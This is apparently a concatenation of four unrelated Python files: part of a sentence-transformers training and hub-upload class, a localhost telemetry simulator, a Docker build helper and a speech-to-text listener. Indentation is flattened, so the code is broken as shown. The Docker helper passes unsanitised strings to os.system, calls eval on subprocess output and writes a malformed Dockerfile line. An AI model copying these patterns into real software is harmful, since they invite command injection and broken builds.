# First create the repo (and clone its content if it's nonempty).
logging.info("Create repository and clone it if it exists")
repo = Repository(tmp_dir, clone_from=repo_url)
# If user provides local files, copy them.
if local_model_path:
copy_tree(local_model_path, tmp_dir)
else: # Else, save model directly into local repo.
create_model_card = replace_model_card or not os.path.exists(os.path.join(tmp_dir, 'README.md'))
self.save(tmp_dir, model_name=full_model_name, create_model_card=create_model_card)
            #Find files larger than 5 MB and track them with git-lfs
large_files = []
for root, dirs, files in os.walk(tmp_dir):
for filename in files:
file_path = os.path.join(root, filename)
rel_path = os.path.relpath(file_path, tmp_dir)
if os.path.getsize(file_path) > (5 * 1024 * 1024):
large_files.append(rel_path)
if len(large_files) > 0:
logging.info("Track files with git lfs: {}".format(", ".join(large_files)))
repo.lfs_track(large_files)
logging.info("Push model to the hub. This might take a while")
push_return = repo.push_to_hub(commit_message=commit_message)
def on_rm_error(func, path, exc_info):
# path contains the path of the file that couldn't be removed
# let's just assume that it's read-only and unlink it.
try:
os.chmod(path, stat.S_IWRITE)
os.unlink(path)
except:
pass
# Remove .git folder. On Windows, the .git folder might be read-only and cannot be deleted
# Hence, try to set write permissions on error
try:
for f in os.listdir(tmp_dir):
shutil.rmtree(os.path.join(tmp_dir, f), onerror=on_rm_error)
except Exception as e:
logging.warning("Error when deleting temp folder: {}".format(str(e)))
pass
return push_return
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
Here, batch is a list of tuples: [(tokens, label), ...]
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0].texts)
texts = [[] for _ in range(num_texts)]
labels = []
for example in batch:
for idx, text in enumerate(example.texts):
texts[idx].append(text)
labels.append(example.label)
labels = torch.tensor(labels).to(self._target_device)
sentence_features = []
for idx in range(num_texts):
tokenized = self.tokenize(texts[idx])
batch_to_device(tokenized, self._target_device)
sentence_features.append(tokenized)
return sentence_features, labels
def _text_length(self, text: Union[List[int], List[List[int]]]):
"""
        Helper function to get the length of the input text. Text can be either
a list of ints (which means a single text as input), or a tuple of list of ints
(representing several text inputs to the model).
"""
if isinstance(text, dict): #{key: value} case
return len(next(iter(text.values())))
elif not hasattr(text, '__len__'): #Object has no len() method
return 1
elif len(text) == 0 or isinstance(text[0], int): #Empty string or list of ints
return len(text)
else:
return sum([len(t) for t in text]) #Sum of length of individual strings
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator = None,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
show_progress_bar: bool = True,
checkpoint_path: str = None,
checkpoint_save_steps: int = 500,
checkpoint_save_total_limit: int = 0
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
        :param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch equals the size of the smallest DataLoader in train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
        :param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate. After that many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
        :param max_grad_norm: Used for gradient clipping (maximum gradient norm).
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
        :param checkpoint_save_steps: Save a checkpoint every this many training steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
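    # Hedged training sketch (not in the original file): one objective, one epoch.
    # The DataLoader contents, the loss (e.g. losses.CosineSimilarityLoss from this
    # package) and the output path are placeholders supplied by the caller.
    #
    #     train_dataloader = DataLoader(train_examples, shuffle=True, batch_size=16)
    #     train_loss = losses.CosineSimilarityLoss(model)
    #     model.fit(train_objectives=[(train_dataloader, train_loss)],
    #               epochs=1, warmup_steps=100, output_path='output/my-model')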
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logging.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
if os.path.exists(model_card_path):
try:
with open(model_card_path, encoding='utf8') as fIn:
self._model_card_text = fIn.read()
except Exception:
pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
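# For reference: each entry of modules.json is expected to look roughly like
#   {"idx": 0, "name": "0", "path": "", "type": "sentence_transformers.models.Transformer"}
# (the exact set of keys is an assumption; the loader above only relies on
# 'type', 'path' and 'name').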
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
server.py
|
import asyncio
import websockets
import json
import math
import time
import threading
import collections
import random
import copy
from urllib.parse import urlparse
from http.server import HTTPServer, BaseHTTPRequestHandler
toHistorical = collections.deque()
toRealTime = collections.deque()
dataRecordLock = threading.Lock()
dataRecord = {
"prop.fuel":[],
"prop.thrusters":[],
"comms.recd":[],
"comms.sent":[],
"pwr.temp":[],
"pwr.c":[],
"Generator.Voltage":[],
}
def recordData():
while True:
while toHistorical:
datum = toHistorical.popleft()
with dataRecordLock:
dataRecord[datum['id']].append(datum)
time.sleep(.05)
def getData(value, start, end):
data = []
# Only show up to 15 minutes worth of data
if end - start > 899*1000:
start = end - 899*1000
with dataRecordLock:
for datum in dataRecord[value]:
if datum['timestamp'] > start and datum['timestamp'] < end:
data.append(datum)
return json.dumps(data)
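# The HTTP side serves requests of the form
#   GET /history/<telemetry id>?start=<ms since epoch>&end=<ms since epoch>
# which serverHandler below routes into getData().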
class serverHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
urlParams = urlparse(self.path)
if not urlParams[2].startswith('/history'):
self.end_headers()
self.wfile.write(b'Unrecognized request :(')
return
# Split the query part of the url into the key value pairs
query = dict(x.split('=') for x in urlParams[4].split('&'))
if "start" not in query:
self.end_headers()
self.wfile.write(b'Missing start in query :(')
return
if "end" not in query:
self.end_headers()
self.wfile.write(b'Missing end in query :(')
return
self.end_headers()
data = getData(urlParams[2].split('/')[2], int(query['start']), int(query['end']))
self.wfile.write(data.encode('utf-8'))
def end_headers(self):
self.send_header('Content-Type','application/json; charset=utf-8')
self.send_header("Access-Control-Allow-Origin", "*")
BaseHTTPRequestHandler.end_headers(self)
async def webSockServer(websocket, path):
print("start of webSockServer")
subs = []
toRealTime.clear()
while True:
try:
while True:
receiveMessage = await asyncio.wait_for(websocket.recv(), 0.001)
if receiveMessage != "":
receiveMessage = receiveMessage.split(' ')
if receiveMessage[0] == "subscribe":
subs.append(receiveMessage[1])
elif receiveMessage[0] == "unsubscribe":
subs.remove(receiveMessage[1])
else:
print(f"Unrecognized command received {receiveMessage[0]}")
except asyncio.TimeoutError:
#print("No commands received")
pass
except Exception as e:
print(f"Error in getting commands from client - {e}")
while toRealTime:
newData = toRealTime.popleft()
if newData['id'] in subs:
await websocket.send(json.dumps(newData))
await asyncio.sleep(1)  # yield to the event loop instead of blocking it with time.sleep
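# Clients drive this loop with plain-text commands, for example:
#   "subscribe prop.fuel"    -> start receiving prop.fuel updates
#   "unsubscribe prop.fuel"  -> stop receiving them
# Matching realtime datums are pushed back to the client as JSON objects.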
def dataProducer():
print("Starting data producer")
fuelDefault = 99
fuel = fuelDefault
thrustersDefault = "ON"
recdDefault = 1
sentDefault = 1
tempDefault = 100
currentDefault = 10
voltageDefault = 28
while True:
time.sleep(1)
datum = {}
datum['timestamp'] = int(time.time()*1000)
# Fuel can decrease at most by 2% per second
fuel = random.uniform(fuel*.98, fuel)
datum['value'] = fuel
datum['id'] = "prop.fuel"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
datum['value'] = thrustersDefault
datum['id'] = "prop.thrusters"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
datum['value'] = recdDefault
datum['id'] = "comms.recd"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
datum['value'] = sentDefault
datum['id'] = "comms.sent"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
temp = random.uniform(tempDefault*.9, tempDefault*1.1)
datum['value'] = temp
datum['id'] = "pwr.temp"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
current = random.uniform(currentDefault*.9, currentDefault*1.05)
datum['value'] = current
datum['id'] = "pwr.c"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
voltage = random.uniform(voltageDefault*.95, voltageDefault*1.05)
datum['value'] = voltage
datum['id'] = "Generator.Voltage"
toHistorical.append(copy.deepcopy(datum))
toRealTime.append(copy.deepcopy(datum))
def main():
global toHistorical
global toRealTime
global dataRecord
httpPort = 8090
webSocketPort = 8091
server = HTTPServer(('localhost', httpPort), serverHandler)
threading.Thread(target=server.serve_forever).start()
threading.Thread(target=recordData).start()
threading.Thread(target=dataProducer).start()
websocketServer = websockets.serve(webSockServer, 'localhost', webSocketPort)
print("Created websocket server")
asyncio.get_event_loop().run_until_complete(websocketServer)
asyncio.get_event_loop().run_forever()
#asyncio.get_event_loop().close()
if __name__ == "__main__":
main()
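# Hedged client sketch (not part of this file): using the websockets package,
# a consumer could subscribe roughly like this:
#   async def client():
#       async with websockets.connect('ws://localhost:8091') as ws:
#           await ws.send('subscribe prop.fuel')
#           print(await ws.recv())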
|
docker_boot.py
|
# encoding: utf-8
from dophon.tools import is_windows
from dophon import boot
import logging
import re
import os
import socket
import sys
import threading
import time
from urllib import request
def read_self_prop():
try:
def_prop = __import__('dophon.def_prop.default_properties', fromlist=True)
u_prop = __import__('application', fromlist=True)
# Compare configuration files and copy missing defaults into the user config
for name in dir(def_prop):
if re.match('__.*__', name):
continue
if name in dir(u_prop):
continue
setattr(u_prop, name, getattr(def_prop, name))
sys.modules['properties'] = u_prop
sys.modules['dophon.properties'] = u_prop
except Exception as e:
logging.error(e)
sys.modules['properties'] = def_prop
sys.modules['dophon.properties'] = def_prop
try:
read_self_prop()
except Exception as e:
logging.error('No custom configuration found: (application.py)')
logging.error('Falling back to the default configuration')
from dophon import properties
from dophon_logger import *
logger = get_logger(DOPHON)
logger.inject_logger(globals())
def IsOpen(ip, port):
"""
Check whether the port is already in use
:param ip:
:param port:
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
logger.error('Port is already in use: ' + str(port))
s.close()
return True
except:
return False
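# Note: IsOpen() returns True when a TCP connect succeeds, i.e. when something
# is already listening on (ip, port); callers use it both as a port-conflict
# check and as a container liveness probe.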
def listen(code):
"""
Listen for a command status code
:param code: return code from os.system()
:return: raises an exception when the command did not execute cleanly; use with care!!!
"""
if code >> 8 == 0:
pass
else:
raise Exception('Command execution failed!')
def listen_container_status(container_port, loop_count: int = 3, wait_sec: int = 10):
"""
Check that the container port is alive
:return:
"""
# Start checking one minute after startup
time.sleep(60)
# Check three times by default
curr_count = 1
while int(curr_count) <= int(loop_count):
# Default interval of 10 seconds between checks
time.sleep(wait_sec)
if IsOpen(get_docker_address(), int(container_port)):
raise Exception('Port mapping error')
else:
# A connection error here is taken to mean the port is occupied as expected
# Issue an HTTP request against the service
url = f'http://{get_docker_address()}:{container_port}/rule/json'
logger.info('Container liveness check: ' + url)
res = request.urlopen(url)
if not res.read():
raise Exception('Service failed to start')
curr_count += 1
logger.info('Container started successfully; run "docker ps" on the command line to check')
def get_docker_address():
"""
Get the IP address of the Docker host
:return:
"""
result = os.popen('ipconfig' if is_windows() else 'ifconfig').readlines()
result_lines = []
r_l_copy = []
while result:
line = result[0]
if re.search('^.*(d|D)(o|O)(c|C)(k|K)(e|E)(r|R).*$', line):
result_lines = result.copy()
break
else:
result.pop(0)
for line in result_lines:
line = re.sub('\s*', '', line)
if line and re.search('([0-9]+\.)+[0-9]+$', line) and re.search('(i|I)(p|P)', line):
r_l_copy.append(
re.search('([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', line).group(0)
)
return r_l_copy.pop(0) if r_l_copy else 'can not get container ip'
def attach_container(base_name: str):
"""
Attach to the container
:return:
"""
os.system('docker attach ' + base_name)
def has_version_expr(info: str):
return re.search('(>=|==|=>|<=|=<)', info)
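# Example: has_version_expr('flask>=1.1.0') matches while has_version_expr('1.1.0')
# does not, so run_as_docker() knows whether it still needs to prepend '>='.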
def run_as_docker(
entity_file_name: str = None,
container_port: str = str(properties.port),
docker_port: str = str(properties.port),
attach_cmd: bool = False,
alive_test: bool = False,
save_image: bool = False,
extra_package: dict = {},
cache_virtual_env_dir: str = '',
package_repository: str = '',
package_cache_path: str = '',
timezone: str = 'Asia/Shanghai',
img_author: str = 'local_user',
img_message: str = 'a new image',
):
"""
Launch the project with Docker
:param save_image: whether to save the image (if enabled, the container is not started; the image is exported directly)
:param alive_test: container liveness check (disabled by default)
:param entity_file_name: entry file name (including extension)
:param container_port: port exposed by the container
:param docker_port: port inside the container -> the exposed port in cluster mode, usually the port defined in the configuration file
:param attach_cmd: whether to attach to a shell inside the container
:param extra_package: extra packages (and versions) that need to be installed
:param cache_virtual_env_dir: path to a cached virtual environment, in the same directory as the entry file or a subdirectory
:param package_repository: package repository (index) to install from; if empty, a plain pip install is performed
# Aliyun mirror => https://mirrors.aliyun.com/pypi/simple/
:param package_cache_path: package cache path
:param timezone: timezone identifier
:return:
"""
# Cache of dependency package names already written
package_cache = []
try:
logger.info('Preparing the container')
root = re.sub('\\\\', '/', properties.project_root)
base_name = os.path.basename(root)
import platform
p_version = platform.python_version()
work_dir = './' + base_name
# Generate the requirements file
logger.info('Generating requirements file')
os.system('pip freeze --all >pre_requirements.txt')
with open('./pre_requirements.txt', 'r') as file:
with open('./requirements.txt', 'w') as final_file:
for line in file.readlines():
if line.startswith('-e'):
continue
for key in sys.modules.keys():
if re.search('^dophon(_\w+)*$', key):
pass
else:
if re.search('^_+', key) or re.search('(_|__|\.)+.+$', key):
# print(key,end=']')
continue
module_path = re.sub(
'-',
'_',
re.sub('''(>=|==|=>|<=|=<|<|>|=)['"\w\.]+\s+''', '', line.lower())
)
# print(module_path, '===>', line, '====>', key) if line.startswith('dophon') and key.startswith(
# 'dophon') else None
if re.search(module_path.lower(), key.lower()) or re.search(key.lower(), module_path.lower()):
if module_path in package_cache:
continue
package_cache.append(module_path)
if module_path in extra_package:
final_file.write(f'{module_path}>={extra_package[module_path]}\n')
extra_package.pop(module_path)
else:
final_file.write(line)
continue
# Write out the extra packages
for package_name, package_version in extra_package.items():
if package_name in extra_package:
final_file.write(
''.join(
[
package_name,
'' if has_version_expr(extra_package[package_name]) else '>=',
extra_package[package_name],
'\n']
)
)
# Would raise a "dictionary changed size during iteration" error
# extra_package.popitem()
else:
final_file.write(
''.join(
[
package_name,
'' if has_version_expr(extra_package[package_name]) else '>=',
package_version,
'\n']
)
)
# Generate the Dockerfile
logger.info('Generating Dockerfile')
with open('./Dockerfile', 'w') as file:
file.write('FROM python:' + p_version + '\n')
file.write('ADD . ' + work_dir + '\n')
# file.write('ADD . ' + work_dir + '/' + base_name + '\n')
file.write('WORKDIR ' + work_dir + '\n')
if cache_virtual_env_dir:
file.write(f'ADD {cache_virtual_env_dir} ~/.cache_virtual_env' + '\n')
file.write(f'CMD ~/.cache_virtual_env/Scripts/activate' + '\n')
if package_cache_path:
file.write(f'ADD {package_cache_path} ~/.package_cache' + '\n')
file.write(f'CMD python -m import sys;sys.path.append("~/.package_cache");' + '\n')
if package_repository:
# Aliyun mirror => https://mirrors.aliyun.com/pypi/simple/
file.write(f'RUN pip install -i {package_repository} -r requirements.txt' + '\n')
else:
file.write('RUN pip install --no-cache-dir -r requirements.txt' + '\n')
# Set the system timezone
file.write(f'ENV TZ={timezone}' + '\n')
file.write('RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone' + '\n')
file.write('CMD ["python","./' + (entity_file_name if entity_file_name else 'Bootstrap.py') + '"]' + '\n')
# file.write('CMD ["/bin/bash"]' + '\n')
os.system('cd ' + root)
logger.info('Stopping any running instance')
os.system('docker stop ' + base_name)
logger.info('Removing the old container')
os.system('docker rm ' + base_name)
logger.info('Removing the old image')
os.system('docker rmi ' + base_name)
logger.info('Validating the configuration')
if IsOpen('127.0.0.1', int(docker_port)):
# Port already in use
logger.warn('The mapped port is already in use!!')
logger.info('Building the image')
listen(os.system('docker build -t ' + base_name + ' .'))
logger.info('Running the image')
os.system(
'docker run -p ' + container_port
+
':' +
docker_port +
' -d --name ' +
base_name + ' ' +
os.path.basename(
root))
if save_image:
logger.info('Checking container status')
from subprocess import Popen, PIPE
status_code = '\'{{.State.Status}}\''
__status = 'running'
while __status == 'running':
p = Popen(
f"docker inspect {base_name} -f {status_code}",
stdout=PIPE,
stderr=PIPE
)
p.wait()
__status = eval(p.stdout.read().decode('utf-8'))
from urllib import request
try:
res = request.urlopen(f'http://127.0.0.1:{container_port}/rule/map')
# for name in dir(res):
# print(f'{name}===>{getattr(res, name)}')
if int(res.code) == 200:
break
except:
pass
if __status == 'exited':
raise Exception(f'Container failed to start, status is {__status}')
logger.info('Committing the image')
from datetime import datetime
__commit_image_name = f'image_{base_name}{datetime.now().timestamp()}'
# Save the image
os.system(f"""
docker commit --author "{img_author}" --message "{img_message}" {base_name} {__commit_image_name}
""")
logger.info('Exporting the image')
os.system(f"""docker save -o {base_name}.img.bak.__ {__commit_image_name}""")
exit(0)
return
logger.info('Printing the container internal address (an empty address means startup failed)')
os.system('docker inspect --format=\'{{.NetworkSettings.IPAddress}}\' ' + base_name)
logger.info('Printing the Docker host address')
print(get_docker_address())
if alive_test:
logger.info('Starting container port liveness check')
threading.Thread(target=listen_container_status, args=(container_port,)).start()
if attach_cmd:
logger.info('Attaching to the container')
# threading.Thread(target=attach_container,args=(base_name,)).start()
attach_container(base_name)
logger.info('Container startup complete')
except Exception as e:
logger.error(e)
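# Hedged usage sketch (illustrative, not part of the original file):
#   from docker_boot import run_as_docker
#   run_as_docker(entity_file_name='Bootstrap.py', container_port='8800',
#                 docker_port='8800', alive_test=True)
# Both ports default to the configured properties.port, and Bootstrap.py is the
# default entry file written into the generated Dockerfile.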
|
speech_to_text.py
|
"""
@title
@description
"""
import argparse
import json
import os
import threading
import time
from datetime import datetime
from time import sleep
import speech_recognition as sr
from auto_drone import DATA_DIR
class Speech2Text:
def __init__(self, input_delay: float = 0.1):
"""
get input from mic
translate signal to words
"""
current_time = time.time()
date_time = datetime.fromtimestamp(time.time())
time_str = date_time.strftime("%Y-%m-%d-%H-%M-%S")
# identification information
self.name = 'google_sr'
self.id = f'{self.name}_{time_str}_{int(current_time)}'
self.event_log = []
self.save_directory = os.path.join(DATA_DIR, 'speech', f'{self.id}')
self.save_fname = os.path.join(self.save_directory, 'message_history.json')
if not os.path.isdir(self.save_directory):
os.makedirs(self.save_directory)
self.input_delay = input_delay
self.mic_history = []
self.listening = False
self.listen_mic_thread = None
self.recognizer = None
return
def cleanup(self):
self.stop_listener()
self.save_history()
return
def get_message_idx(self, message_idx: int):
"""
todo make into iterator using queue
:param message_idx:
:return:
"""
message = self.mic_history[message_idx] if len(self.mic_history) > message_idx else None
return message
def get_last_message(self):
last_translate = self.mic_history[-1] if len(self.mic_history) > 0 else None
return last_translate
def start_listener(self):
"""
:return:
"""
self.listening = True
self.listen_mic_thread = threading.Thread(target=self.__listen_microphone, daemon=True)
self.listen_mic_thread.start()
return
def __listen_microphone(self):
"""
:return:
"""
self.recognizer = sr.Recognizer()
with sr.Microphone() as source:
self.recognizer.adjust_for_ambient_noise(source)
while self.listening:
audio = self.recognizer.listen(source)
try:
audio_text = self.recognizer.recognize_google(audio)
self.mic_history.append(audio_text)
sleep(self.input_delay)
except sr.UnknownValueError as uve:
# self.mic_history.append(f'{uve}')
pass
except sr.RequestError as re:
# self.mic_history.append(f'{re}')
pass
return
def stop_listener(self):
self.listening = False
return
def save_history(self):
"""
:return:
"""
with open(self.save_fname, 'w+') as save_file:
json.dump(fp=save_file, obj=self.mic_history, indent=2)
return
def main(main_args):
input_delay = main_args.get('input_delay', 0.1)
run_len = main_args.get('run_len', 5)
#######################################
speech_text = Speech2Text(input_delay=input_delay)
speech_text.start_listener()
sleep(run_len)
speech_text.stop_listener()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('--input_delay', type=float, default=5,
help='seconds to sleep after each successful recognition')
parser.add_argument('--run_len', type=float, default=10,
help='how long to keep the listener running, in seconds')
args = parser.parse_args()
main(vars(args))
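# Hedged interactive sketch (uses only names defined in this file; the mic and
# network setup are assumed to be available):
#   s2t = Speech2Text(input_delay=0.1)
#   s2t.start_listener()             # spawns the daemon microphone thread
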